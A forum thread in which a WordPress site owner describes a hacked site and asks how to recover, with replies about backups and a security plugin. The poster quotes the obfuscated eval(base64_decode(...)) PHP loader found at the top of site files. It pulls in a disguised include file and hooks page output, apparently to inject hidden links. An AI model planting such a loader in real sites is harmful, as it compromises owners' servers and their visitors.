Wordpress site compromised

I seem to have this crap on the top of near every wordpress file;

<?php /**/eval(base64_decode(‘aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3d3d2ZyZXAvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvanMvdGlueW1jZS9wbHVnaW5zL2lubGluZXBvcHVwcy9za2lucy9jbGVhcmxvb2tzMi9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==’)); ?>

I guess this is responsible for all the hidden outbound links i can see in the “view html source” output.

I also have had my wp-login removed. Sigh. Any way I can tell which version of WP it was so I can replace it?

All advice appreciated

wow, just incredible, i removed some of it and now my site is dead at;


but if you view source the hacked inputted links are STILL THERE wow I almost admire the ingenuity

Do you have a recent backup to restore from? Also check out WordPress › Better WP Security « WordPress Plugins

What version of Wordpress were you using?